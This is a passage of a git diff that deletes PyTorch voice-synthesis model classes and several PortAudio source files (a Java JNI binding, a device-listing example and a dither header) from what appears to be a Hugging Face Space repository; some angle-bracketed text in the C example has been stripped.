resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - gin_channels=gin_channels, - ) - self.enc_q = PosteriorEncoder( - spec_channels, - inter_channels, - hidden_channels, - 5, - 1, - 16, - gin_channels=gin_channels, - ) - self.flow = ResidualCouplingBlock( - inter_channels, hidden_channels, 5, 1, 3, gin_channels=gin_channels - ) - self.emb_g = nn.Embedding(self.spk_embed_dim, gin_channels) - print("gin_channels:", gin_channels, "self.spk_embed_dim:", self.spk_embed_dim) - - def remove_weight_norm(self): - self.dec.remove_weight_norm() - self.flow.remove_weight_norm() - self.enc_q.remove_weight_norm() - - def forward(self, phone, phone_lengths, y, y_lengths, ds): # 这里ds是id,[bs,1] - g = self.emb_g(ds).unsqueeze(-1) # [b, 256, 1]##1是t,广播的 - m_p, logs_p, x_mask = self.enc_p(phone, None, phone_lengths) - z, m_q, logs_q, y_mask = self.enc_q(y, y_lengths, g=g) - z_p = self.flow(z, y_mask, g=g) - z_slice, ids_slice = commons.rand_slice_segments( - z, y_lengths, self.segment_size - ) - o = self.dec(z_slice, g=g) - return o, ids_slice, x_mask, y_mask, (z, z_p, m_p, logs_p, m_q, logs_q) - - def infer(self, phone, phone_lengths, sid, rate=None): - g = self.emb_g(sid).unsqueeze(-1) - m_p, logs_p, x_mask = self.enc_p(phone, None, phone_lengths) - z_p = (m_p + torch.exp(logs_p) * torch.randn_like(m_p) * 0.66666) * x_mask - if rate: - head = int(z_p.shape[2] * rate) - z_p = z_p[:, :, -head:] - x_mask = x_mask[:, :, -head:] - z = self.flow(z_p, x_mask, g=g, reverse=True) - o = self.dec(z * x_mask, g=g) - return o, x_mask, (z, z_p, m_p, logs_p) - - -class SynthesizerTrnMs768NSFsid_nono(nn.Module): - def __init__( - self, - spec_channels, - segment_size, - inter_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - spk_embed_dim, - gin_channels, - sr=None, - **kwargs - ): - super().__init__() - self.spec_channels = spec_channels - self.inter_channels = inter_channels - self.hidden_channels = hidden_channels - self.filter_channels = filter_channels - self.n_heads = n_heads - self.n_layers = n_layers - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.resblock = resblock - self.resblock_kernel_sizes = resblock_kernel_sizes - self.resblock_dilation_sizes = resblock_dilation_sizes - self.upsample_rates = upsample_rates - self.upsample_initial_channel = upsample_initial_channel - self.upsample_kernel_sizes = upsample_kernel_sizes - self.segment_size = segment_size - self.gin_channels = gin_channels - # self.hop_length = hop_length# - self.spk_embed_dim = spk_embed_dim - self.enc_p = TextEncoder768( - inter_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - f0=False, - ) - self.dec = Generator( - inter_channels, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - gin_channels=gin_channels, - ) - self.enc_q = PosteriorEncoder( - spec_channels, - inter_channels, - hidden_channels, - 5, - 1, - 16, - gin_channels=gin_channels, - ) - self.flow = ResidualCouplingBlock( - inter_channels, hidden_channels, 5, 1, 3, gin_channels=gin_channels - ) - self.emb_g = nn.Embedding(self.spk_embed_dim, gin_channels) - print("gin_channels:", gin_channels, "self.spk_embed_dim:", self.spk_embed_dim) - - def remove_weight_norm(self): - self.dec.remove_weight_norm() - self.flow.remove_weight_norm() - self.enc_q.remove_weight_norm() - - def forward(self, phone, phone_lengths, y, y_lengths, ds): # 这里ds是id,[bs,1] - g = self.emb_g(ds).unsqueeze(-1) # [b, 256, 1]##1是t,广播的 - m_p, logs_p, x_mask = self.enc_p(phone, None, phone_lengths) - z, m_q, logs_q, y_mask = self.enc_q(y, y_lengths, g=g) - z_p = self.flow(z, y_mask, g=g) - z_slice, ids_slice = commons.rand_slice_segments( - z, y_lengths, self.segment_size - ) - o = self.dec(z_slice, g=g) - return o, ids_slice, x_mask, y_mask, (z, z_p, m_p, logs_p, m_q, logs_q) - - def infer(self, phone, phone_lengths, sid, rate=None): - g = self.emb_g(sid).unsqueeze(-1) - m_p, logs_p, x_mask = self.enc_p(phone, None, phone_lengths) - z_p = (m_p + torch.exp(logs_p) * torch.randn_like(m_p) * 0.66666) * x_mask - if rate: - head = int(z_p.shape[2] * rate) - z_p = z_p[:, :, -head:] - x_mask = x_mask[:, :, -head:] - z = self.flow(z_p, x_mask, g=g, reverse=True) - o = self.dec(z * x_mask, g=g) - return o, x_mask, (z, z_p, m_p, logs_p) - - -class MultiPeriodDiscriminator(torch.nn.Module): - def __init__(self, use_spectral_norm=False): - super(MultiPeriodDiscriminator, self).__init__() - periods = [2, 3, 5, 7, 11, 17] - # periods = [3, 5, 7, 11, 17, 23, 37] - - discs = [DiscriminatorS(use_spectral_norm=use_spectral_norm)] - discs = discs + [ - DiscriminatorP(i, use_spectral_norm=use_spectral_norm) for i in periods - ] - self.discriminators = nn.ModuleList(discs) - - def forward(self, y, y_hat): - y_d_rs = [] # - y_d_gs = [] - fmap_rs = [] - fmap_gs = [] - for i, d in enumerate(self.discriminators): - y_d_r, fmap_r = d(y) - y_d_g, fmap_g = d(y_hat) - # for j in range(len(fmap_r)): - # print(i,j,y.shape,y_hat.shape,fmap_r[j].shape,fmap_g[j].shape) - y_d_rs.append(y_d_r) - y_d_gs.append(y_d_g) - fmap_rs.append(fmap_r) - fmap_gs.append(fmap_g) - - return y_d_rs, y_d_gs, fmap_rs, fmap_gs - - -class MultiPeriodDiscriminatorV2(torch.nn.Module): - def __init__(self, use_spectral_norm=False): - super(MultiPeriodDiscriminatorV2, self).__init__() - # periods = [2, 3, 5, 7, 11, 17] - periods = [2, 3, 5, 7, 11, 17, 23, 37] - - discs = [DiscriminatorS(use_spectral_norm=use_spectral_norm)] - discs = discs + [ - DiscriminatorP(i, use_spectral_norm=use_spectral_norm) for i in periods - ] - self.discriminators = nn.ModuleList(discs) - - def forward(self, y, y_hat): - y_d_rs = [] # - y_d_gs = [] - fmap_rs = [] - fmap_gs = [] - for i, d in enumerate(self.discriminators): - y_d_r, fmap_r = d(y) - y_d_g, fmap_g = d(y_hat) - # for j in range(len(fmap_r)): - # print(i,j,y.shape,y_hat.shape,fmap_r[j].shape,fmap_g[j].shape) - y_d_rs.append(y_d_r) - y_d_gs.append(y_d_g) - fmap_rs.append(fmap_r) - fmap_gs.append(fmap_g) - - return y_d_rs, y_d_gs, fmap_rs, fmap_gs - - -class DiscriminatorS(torch.nn.Module): - def __init__(self, use_spectral_norm=False): - super(DiscriminatorS, self).__init__() - norm_f = weight_norm if use_spectral_norm == False else spectral_norm - self.convs = nn.ModuleList( - [ - norm_f(Conv1d(1, 16, 15, 1, padding=7)), - norm_f(Conv1d(16, 64, 41, 4, groups=4, padding=20)), - norm_f(Conv1d(64, 256, 41, 4, groups=16, padding=20)), - norm_f(Conv1d(256, 1024, 41, 4, groups=64, padding=20)), - norm_f(Conv1d(1024, 1024, 41, 4, groups=256, padding=20)), - norm_f(Conv1d(1024, 1024, 5, 1, padding=2)), - ] - ) - self.conv_post = norm_f(Conv1d(1024, 1, 3, 1, padding=1)) - - def forward(self, x): - fmap = [] - - for l in self.convs: - x = l(x) - x = F.leaky_relu(x, modules.LRELU_SLOPE) - fmap.append(x) - x = self.conv_post(x) - fmap.append(x) - x = torch.flatten(x, 1, -1) - - return x, fmap - - -class DiscriminatorP(torch.nn.Module): - def __init__(self, period, kernel_size=5, stride=3, use_spectral_norm=False): - super(DiscriminatorP, self).__init__() - self.period = period - self.use_spectral_norm = use_spectral_norm - norm_f = weight_norm if use_spectral_norm == False else spectral_norm - self.convs = nn.ModuleList( - [ - norm_f( - Conv2d( - 1, - 32, - (kernel_size, 1), - (stride, 1), - padding=(get_padding(kernel_size, 1), 0), - ) - ), - norm_f( - Conv2d( - 32, - 128, - (kernel_size, 1), - (stride, 1), - padding=(get_padding(kernel_size, 1), 0), - ) - ), - norm_f( - Conv2d( - 128, - 512, - (kernel_size, 1), - (stride, 1), - padding=(get_padding(kernel_size, 1), 0), - ) - ), - norm_f( - Conv2d( - 512, - 1024, - (kernel_size, 1), - (stride, 1), - padding=(get_padding(kernel_size, 1), 0), - ) - ), - norm_f( - Conv2d( - 1024, - 1024, - (kernel_size, 1), - 1, - padding=(get_padding(kernel_size, 1), 0), - ) - ), - ] - ) - self.conv_post = norm_f(Conv2d(1024, 1, (3, 1), 1, padding=(1, 0))) - - def forward(self, x): - fmap = [] - - # 1d to 2d - b, c, t = x.shape - if t % self.period != 0: # pad first - n_pad = self.period - (t % self.period) - x = F.pad(x, (0, n_pad), "reflect") - t = t + n_pad - x = x.view(b, c, t // self.period, self.period) - - for l in self.convs: - x = l(x) - x = F.leaky_relu(x, modules.LRELU_SLOPE) - fmap.append(x) - x = self.conv_post(x) - fmap.append(x) - x = torch.flatten(x, 1, -1) - - return x, fmap diff --git a/spaces/amarchheda/ChordDuplicate/portaudio/bindings/java/c/src/com_portaudio_PortAudio.c b/spaces/amarchheda/ChordDuplicate/portaudio/bindings/java/c/src/com_portaudio_PortAudio.c deleted file mode 100644 index 77c42eba851c46dbddf6cbdfa2f2aa12c1782c6b..0000000000000000000000000000000000000000 --- a/spaces/amarchheda/ChordDuplicate/portaudio/bindings/java/c/src/com_portaudio_PortAudio.c +++ /dev/null @@ -1,279 +0,0 @@ -/* - * Portable Audio I/O Library - * Java Binding for PortAudio - * - * Based on the Open Source API proposed by Ross Bencina - * Copyright (c) 2008 Ross Bencina - * - * Permission is hereby granted, free of charge, to any person obtaining - * a copy of this software and associated documentation files - * (the "Software"), to deal in the Software without restriction, - * including without limitation the rights to use, copy, modify, merge, - * publish, distribute, sublicense, and/or sell copies of the Software, - * and to permit persons to whom the Software is furnished to do so, - * subject to the following conditions: - * - * The above copyright notice and this permission notice shall be - * included in all copies or substantial portions of the Software. - * - * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, - * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF - * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. - * IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR - * ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF - * CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION - * WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. - */ - -/* - * The text above constitutes the entire PortAudio license; however, - * the PortAudio community also makes the following non-binding requests: - * - * Any person wishing to distribute modifications to the Software is - * requested to send the modifications to the original developer so that - * they can be incorporated into the canonical version. It is also - * requested that these non-binding requests be included along with the - * license above. - */ - -#include "com_portaudio_PortAudio.h" -#include "portaudio.h" -#include "jpa_tools.h" - -/* - * Class: com_portaudio_PortAudio - * Method: getVersion - * Signature: ()I - */ -JNIEXPORT jint JNICALL Java_com_portaudio_PortAudio_getVersion - (JNIEnv *env, jclass clazz) -{ - return Pa_GetVersion(); -} - -/* - * Class: com_portaudio_PortAudio - * Method: getVersionText - * Signature: ()Ljava/lang/String; - */ -JNIEXPORT jstring JNICALL Java_com_portaudio_PortAudio_getVersionText - (JNIEnv *env, jclass clazz) -{ - return (*env)->NewStringUTF(env, Pa_GetVersionText() ); -} - -/* - * Class: com_portaudio_PortAudio - * Method: initialize - * Signature: ()I - */ -JNIEXPORT void JNICALL Java_com_portaudio_PortAudio_initialize - (JNIEnv *env, jclass clazz) -{ - PaError err = Pa_Initialize(); - jpa_CheckError( env, err ); -} - -/* - * Class: com_portaudio_PortAudio - * Method: terminate - * Signature: ()I - */ -JNIEXPORT void JNICALL Java_com_portaudio_PortAudio_terminate - (JNIEnv *env, jclass clazz) -{ - PaError err = Pa_Terminate(); - jpa_CheckError( env, err ); -} - -/* - * Class: com_portaudio_PortAudio - * Method: getDeviceCount - * Signature: ()I - */ -JNIEXPORT jint JNICALL Java_com_portaudio_PortAudio_getDeviceCount - (JNIEnv *env, jclass clazz) -{ - jint count = Pa_GetDeviceCount(); - return jpa_CheckError( env, count ); -} - -/* - * Class: com_portaudio_PortAudio - * Method: getDeviceInfo - * Signature: (ILcom/portaudio/DeviceInfo;)I - */ -JNIEXPORT void JNICALL Java_com_portaudio_PortAudio_getDeviceInfo - (JNIEnv *env, jclass clazz, jint index, jobject deviceInfo) -{ - const PaDeviceInfo *info; - /* Get a reference to obj's class */ - jclass cls = (*env)->GetObjectClass(env, deviceInfo); - - info = Pa_GetDeviceInfo( index ); - if( info == NULL ) - { - jpa_ThrowError( env, "Pa_GetDeviceInfo returned NULL." ); - } - else - { - jpa_SetStringField( env, cls, deviceInfo, "name", info->name ); - jpa_SetIntField( env, cls, deviceInfo, "maxInputChannels", info->maxInputChannels ); - jpa_SetIntField( env, cls, deviceInfo, "maxOutputChannels", info->maxOutputChannels ); - jpa_SetIntField( env, cls, deviceInfo, "hostApi", info->hostApi ); - jpa_SetDoubleField( env, cls, deviceInfo, "defaultSampleRate", info->defaultSampleRate ); - jpa_SetDoubleField( env, cls, deviceInfo, "defaultLowInputLatency", info->defaultLowInputLatency ); - jpa_SetDoubleField( env, cls, deviceInfo, "defaultLowInputLatency", info->defaultHighInputLatency ); - jpa_SetDoubleField( env, cls, deviceInfo, "defaultLowOutputLatency", info->defaultLowOutputLatency ); - jpa_SetDoubleField( env, cls, deviceInfo, "defaultHighOutputLatency", info->defaultHighOutputLatency ); - } -} - -/* - * Class: com_portaudio_PortAudio - * Method: geHostApiCount - * Signature: ()I - */ -JNIEXPORT jint JNICALL Java_com_portaudio_PortAudio_getHostApiCount - (JNIEnv *env, jclass clazz) -{ - jint count = Pa_GetHostApiCount(); - return jpa_CheckError( env, count ); -} - - -/* - * Class: com_portaudio_PortAudio - * Method: hostApiTypeIdToHostApiIndex - * Signature: (I)I - */ -JNIEXPORT jint JNICALL Java_com_portaudio_PortAudio_hostApiTypeIdToHostApiIndex - (JNIEnv *env, jclass clazz, jint hostApiType) -{ - return Pa_HostApiTypeIdToHostApiIndex( (PaHostApiTypeId) hostApiType ); -} - -/* - * Class: com_portaudio_PortAudio - * Method: hostApiDeviceIndexToDeviceIndex - * Signature: (II)I - */ -JNIEXPORT jint JNICALL Java_com_portaudio_PortAudio_hostApiDeviceIndexToDeviceIndex - (JNIEnv *env, jclass clazz, jint hostApiIndex, jint apiDeviceIndex) -{ - return Pa_HostApiDeviceIndexToDeviceIndex( hostApiIndex, apiDeviceIndex ); -} - - -/* - * Class: com_portaudio_PortAudio - * Method: getHostApiInfo - * Signature: (ILcom/portaudio/HostApiInfo;)I - */ -JNIEXPORT void JNICALL Java_com_portaudio_PortAudio_getHostApiInfo - (JNIEnv *env, jclass clazz, jint index, jobject hostApiInfo) -{ - const PaHostApiInfo *info; - /* Get a reference to obj's class */ - jclass cls = (*env)->GetObjectClass(env, hostApiInfo); - - info = Pa_GetHostApiInfo( index ); - if( info == NULL ) - { - jpa_ThrowError( env, "Pa_GetHostApiInfo returned NULL." ); - } - else - { - jpa_SetIntField( env, cls, hostApiInfo, "version", info->structVersion ); - jpa_SetIntField( env, cls, hostApiInfo, "type", info->type ); - jpa_SetStringField( env, cls, hostApiInfo, "name", info->name ); - jpa_SetIntField( env, cls, hostApiInfo, "deviceCount", info->deviceCount ); - jpa_SetIntField( env, cls, hostApiInfo, "defaultInputDevice", info->defaultInputDevice ); - jpa_SetIntField( env, cls, hostApiInfo, "defaultOutputDevice", info->defaultOutputDevice ); - } -} - -/* - * Class: com_portaudio_PortAudio - * Method: getDefaultInputDevice - * Signature: ()I - */ -JNIEXPORT jint JNICALL Java_com_portaudio_PortAudio_getDefaultInputDevice - (JNIEnv *env, jclass clazz) -{ - jint deviceId = Pa_GetDefaultInputDevice(); - return jpa_CheckError( env, deviceId ); -} - -/* - * Class: com_portaudio_PortAudio - * Method: getDefaultOutputDevice - * Signature: ()I - */ -JNIEXPORT jint JNICALL Java_com_portaudio_PortAudio_getDefaultOutputDevice - (JNIEnv *env, jclass clazz) -{ - jint deviceId = Pa_GetDefaultOutputDevice(); - return jpa_CheckError( env, deviceId ); -} - -/* - * Class: com_portaudio_PortAudio - * Method: getDefaultHostApi - * Signature: ()I - */ -JNIEXPORT jint JNICALL Java_com_portaudio_PortAudio_getDefaultHostApi - (JNIEnv *env, jclass clazz) -{ - jint deviceId = Pa_GetDefaultHostApi(); - return jpa_CheckError( env, deviceId ); -} - -/* - * Class: com_portaudio_PortAudio - * Method: isFormatSupported - * Signature: (Lcom/portaudio/StreamParameters;Lcom/portaudio/StreamParameters;I)I - */ -JNIEXPORT jint JNICALL Java_com_portaudio_PortAudio_isFormatSupported - (JNIEnv *env, jclass clazz, jobject inParams, jobject outParams, jint sampleRate ) -{ - PaStreamParameters myInParams, *paInParams; - PaStreamParameters myOutParams, *paOutParams; - - paInParams = jpa_FillStreamParameters( env, inParams, &myInParams ); - paOutParams = jpa_FillStreamParameters( env, outParams, &myOutParams ); - - return Pa_IsFormatSupported( paInParams, paOutParams, sampleRate ); - -} - -/* - * Class: com_portaudio_PortAudio - * Method: openStream - * Signature: (Lcom/portaudio/BlockingStream;Lcom/portaudio/StreamParameters;Lcom/portaudio/StreamParameters;III)I - */ -JNIEXPORT void JNICALL Java_com_portaudio_PortAudio_openStream - (JNIEnv *env, jclass clazz, jobject blockingStream, jobject inParams, jobject outParams, jint sampleRate, jint framesPerBuffer, jint flags ) -{ - int err; - PaStreamParameters myInParams, *paInParams; - PaStreamParameters myOutParams, *paOutParams; - PaStream *stream; - - paInParams = jpa_FillStreamParameters( env, inParams, &myInParams ); - paOutParams = jpa_FillStreamParameters( env, outParams, &myOutParams ); - err = Pa_OpenStream( &stream, paInParams, paOutParams, sampleRate, framesPerBuffer, flags, NULL, NULL ); - if( jpa_CheckError( env, err ) == 0 ) - { - jclass cls = (*env)->GetObjectClass(env, blockingStream); - jpa_SetLongField( env, cls, blockingStream, "nativeStream", (jlong) stream ); - if( paInParams != NULL ) - { - jpa_SetIntField( env, cls, blockingStream, "inputFormat", paInParams->sampleFormat ); - } - if( paOutParams != NULL ) - { - jpa_SetIntField( env, cls, blockingStream, "outputFormat", paOutParams->sampleFormat ); - } - } -} diff --git a/spaces/amarchheda/ChordDuplicate/portaudio/examples/pa_devs.c b/spaces/amarchheda/ChordDuplicate/portaudio/examples/pa_devs.c deleted file mode 100644 index 27acfd53b24ade7ec95545617f9975db0758a911..0000000000000000000000000000000000000000 --- a/spaces/amarchheda/ChordDuplicate/portaudio/examples/pa_devs.c +++ /dev/null @@ -1,252 +0,0 @@ -/** @file pa_devs.c - @ingroup examples_src - @brief List available devices, including device information. - @author Phil Burk http://www.softsynth.com - - @note Define PA_USE_ASIO=0 to compile this code on Windows without - ASIO support. -*/ -/* - * $Id$ - * - * This program uses the PortAudio Portable Audio Library. - * For more information see: http://www.portaudio.com - * Copyright (c) 1999-2000 Ross Bencina and Phil Burk - * - * Permission is hereby granted, free of charge, to any person obtaining - * a copy of this software and associated documentation files - * (the "Software"), to deal in the Software without restriction, - * including without limitation the rights to use, copy, modify, merge, - * publish, distribute, sublicense, and/or sell copies of the Software, - * and to permit persons to whom the Software is furnished to do so, - * subject to the following conditions: - * - * The above copyright notice and this permission notice shall be - * included in all copies or substantial portions of the Software. - * - * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, - * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF - * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. - * IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR - * ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF - * CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION - * WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. - */ - -/* - * The text above constitutes the entire PortAudio license; however, - * the PortAudio community also makes the following non-binding requests: - * - * Any person wishing to distribute modifications to the Software is - * requested to send the modifications to the original developer so that - * they can be incorporated into the canonical version. It is also - * requested that these non-binding requests be included along with the - * license above. - */ - -#include -#include -#include "portaudio.h" - -#ifdef WIN32 -#include - -#if PA_USE_ASIO -#include "pa_asio.h" -#endif -#endif - -/*******************************************************************/ -static void PrintSupportedStandardSampleRates( - const PaStreamParameters *inputParameters, - const PaStreamParameters *outputParameters ) -{ - static double standardSampleRates[] = { - 8000.0, 9600.0, 11025.0, 12000.0, 16000.0, 22050.0, 24000.0, 32000.0, - 44100.0, 48000.0, 88200.0, 96000.0, 192000.0, -1 /* negative terminated list */ - }; - int i, printCount; - PaError err; - - printCount = 0; - for( i=0; standardSampleRates[i] > 0; i++ ) - { - err = Pa_IsFormatSupported( inputParameters, outputParameters, standardSampleRates[i] ); - if( err == paFormatIsSupported ) - { - if( printCount == 0 ) - { - printf( "\t%8.2f", standardSampleRates[i] ); - printCount = 1; - } - else if( printCount == 4 ) - { - printf( ",\n\t%8.2f", standardSampleRates[i] ); - printCount = 1; - } - else - { - printf( ", %8.2f", standardSampleRates[i] ); - ++printCount; - } - } - } - if( !printCount ) - printf( "None\n" ); - else - printf( "\n" ); -} - -/*******************************************************************/ -int main(void); -int main(void) -{ - int i, numDevices, defaultDisplayed; - const PaDeviceInfo *deviceInfo; - PaStreamParameters inputParameters, outputParameters; - PaError err; - - - err = Pa_Initialize(); - if( err != paNoError ) - { - printf( "ERROR: Pa_Initialize returned 0x%x\n", err ); - goto error; - } - - printf( "PortAudio version: 0x%08X\n", Pa_GetVersion()); - printf( "Version text: '%s'\n", Pa_GetVersionInfo()->versionText ); - - numDevices = Pa_GetDeviceCount(); - if( numDevices < 0 ) - { - printf( "ERROR: Pa_GetDeviceCount returned 0x%x\n", numDevices ); - err = numDevices; - goto error; - } - - printf( "Number of devices = %d\n", numDevices ); - for( i=0; ihostApi )->defaultInputDevice ) - { - const PaHostApiInfo *hostInfo = Pa_GetHostApiInfo( deviceInfo->hostApi ); - printf( "[ Default %s Input", hostInfo->name ); - defaultDisplayed = 1; - } - - if( i == Pa_GetDefaultOutputDevice() ) - { - printf( (defaultDisplayed ? "," : "[") ); - printf( " Default Output" ); - defaultDisplayed = 1; - } - else if( i == Pa_GetHostApiInfo( deviceInfo->hostApi )->defaultOutputDevice ) - { - const PaHostApiInfo *hostInfo = Pa_GetHostApiInfo( deviceInfo->hostApi ); - printf( (defaultDisplayed ? "," : "[") ); - printf( " Default %s Output", hostInfo->name ); - defaultDisplayed = 1; - } - - if( defaultDisplayed ) - printf( " ]\n" ); - - /* print device info fields */ -#ifdef WIN32 - { /* Use wide char on windows, so we can show UTF-8 encoded device names */ - wchar_t wideName[MAX_PATH]; - MultiByteToWideChar(CP_UTF8, 0, deviceInfo->name, -1, wideName, MAX_PATH-1); - wprintf( L"Name = %s\n", wideName ); - } -#else - printf( "Name = %s\n", deviceInfo->name ); -#endif - printf( "Host API = %s\n", Pa_GetHostApiInfo( deviceInfo->hostApi )->name ); - printf( "Max inputs = %d", deviceInfo->maxInputChannels ); - printf( ", Max outputs = %d\n", deviceInfo->maxOutputChannels ); - - printf( "Default low input latency = %8.4f\n", deviceInfo->defaultLowInputLatency ); - printf( "Default low output latency = %8.4f\n", deviceInfo->defaultLowOutputLatency ); - printf( "Default high input latency = %8.4f\n", deviceInfo->defaultHighInputLatency ); - printf( "Default high output latency = %8.4f\n", deviceInfo->defaultHighOutputLatency ); - -#ifdef WIN32 -#if PA_USE_ASIO -/* ASIO specific latency information */ - if( Pa_GetHostApiInfo( deviceInfo->hostApi )->type == paASIO ){ - long minLatency, maxLatency, preferredLatency, granularity; - - err = PaAsio_GetAvailableLatencyValues( i, - &minLatency, &maxLatency, &preferredLatency, &granularity ); - - printf( "ASIO minimum buffer size = %ld\n", minLatency ); - printf( "ASIO maximum buffer size = %ld\n", maxLatency ); - printf( "ASIO preferred buffer size = %ld\n", preferredLatency ); - - if( granularity == -1 ) - printf( "ASIO buffer granularity = power of 2\n" ); - else - printf( "ASIO buffer granularity = %ld\n", granularity ); - } -#endif /* PA_USE_ASIO */ -#endif /* WIN32 */ - - printf( "Default sample rate = %8.2f\n", deviceInfo->defaultSampleRate ); - - /* poll for standard sample rates */ - inputParameters.device = i; - inputParameters.channelCount = deviceInfo->maxInputChannels; - inputParameters.sampleFormat = paInt16; - inputParameters.suggestedLatency = 0; /* ignored by Pa_IsFormatSupported() */ - inputParameters.hostApiSpecificStreamInfo = NULL; - - outputParameters.device = i; - outputParameters.channelCount = deviceInfo->maxOutputChannels; - outputParameters.sampleFormat = paInt16; - outputParameters.suggestedLatency = 0; /* ignored by Pa_IsFormatSupported() */ - outputParameters.hostApiSpecificStreamInfo = NULL; - - if( inputParameters.channelCount > 0 ) - { - printf("Supported standard sample rates\n for half-duplex 16 bit %d channel input = \n", - inputParameters.channelCount ); - PrintSupportedStandardSampleRates( &inputParameters, NULL ); - } - - if( outputParameters.channelCount > 0 ) - { - printf("Supported standard sample rates\n for half-duplex 16 bit %d channel output = \n", - outputParameters.channelCount ); - PrintSupportedStandardSampleRates( NULL, &outputParameters ); - } - - if( inputParameters.channelCount > 0 && outputParameters.channelCount > 0 ) - { - printf("Supported standard sample rates\n for full-duplex 16 bit %d channel input, %d channel output = \n", - inputParameters.channelCount, outputParameters.channelCount ); - PrintSupportedStandardSampleRates( &inputParameters, &outputParameters ); - } - } - - Pa_Terminate(); - - printf("----------------------------------------------\n"); - return 0; - -error: - Pa_Terminate(); - fprintf( stderr, "Error number: %d\n", err ); - fprintf( stderr, "Error message: %s\n", Pa_GetErrorText( err ) ); - return err; -} diff --git a/spaces/amarchheda/ChordDuplicate/portaudio/src/common/pa_dither.h b/spaces/amarchheda/ChordDuplicate/portaudio/src/common/pa_dither.h deleted file mode 100644 index 4f81123016891886e6bcd53151835e29d2046200..0000000000000000000000000000000000000000 --- a/spaces/amarchheda/ChordDuplicate/portaudio/src/common/pa_dither.h +++ /dev/null @@ -1,106 +0,0 @@ -#ifndef PA_DITHER_H -#define PA_DITHER_H -/* - * $Id$ - * Portable Audio I/O Library triangular dither generator - * - * Based on the Open Source API proposed by Ross Bencina - * Copyright (c) 1999-2002 Phil Burk, Ross Bencina - * - * Permission is hereby granted, free of charge, to any person obtaining - * a copy of this software and associated documentation files - * (the "Software"), to deal in the Software without restriction, - * including without limitation the rights to use, copy, modify, merge, - * publish, distribute, sublicense, and/or sell copies of the Software, - * and to permit persons to whom the Software is furnished to do so, - * subject to the following conditions: - * - * The above copyright notice and this permission notice shall be - * included in all copies or substantial portions of the Software. - * - * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, - * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF - * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. - * IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR - * ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF - * CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION - * WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. - */ - -/* - * The text above constitutes the entire PortAudio license; however, - * the PortAudio community also makes the following non-binding requests: - * - * Any person wishing to distribute modifications to the Software is - * requested to send the modifications to the original developer so that - * they can be incorporated into the canonical version. It is also - * requested that these non-binding requests be included along with the - * license above. - */ - -/** @file - @ingroup common_src - - @brief Functions for generating dither noise -*/ - -#include "pa_types.h" - - -#ifdef __cplusplus -extern "C" -{ -#endif /* __cplusplus */ - -/* Note that the linear congruential algorithm requires 32 bit integers - * because it uses arithmetic overflow. So use PaUint32 instead of - * unsigned long so it will work on 64 bit systems. - */ - -/** @brief State needed to generate a dither signal */ -typedef struct PaUtilTriangularDitherGenerator{ - PaUint32 previous; - PaUint32 randSeed1; - PaUint32 randSeed2; -} PaUtilTriangularDitherGenerator; - - -/** @brief Initialize dither state */ -void PaUtil_InitializeTriangularDitherState( PaUtilTriangularDitherGenerator *ditherState ); - - -/** - @brief Calculate 2 LSB dither signal with a triangular distribution. - Ranged for adding to a 1 bit right-shifted 32 bit integer - prior to >>15. eg: -
    -    signed long in = *
    -    signed long dither = PaUtil_Generate16BitTriangularDither( ditherState );
    -    signed short out = (signed short)(((in>>1) + dither) >> 15);
    -
    - @return - A signed 32-bit integer with a range of +32767 to -32768 -*/ -PaInt32 PaUtil_Generate16BitTriangularDither( PaUtilTriangularDitherGenerator *ditherState ); - - -/** - @brief Calculate 2 LSB dither signal with a triangular distribution. - Ranged for adding to a pre-scaled float. -
    -    float in = *
    -    float dither = PaUtil_GenerateFloatTriangularDither( ditherState );
    -    // use smaller scaler to prevent overflow when we add the dither
    -    signed short out = (signed short)(in*(32766.0f) + dither );
    -
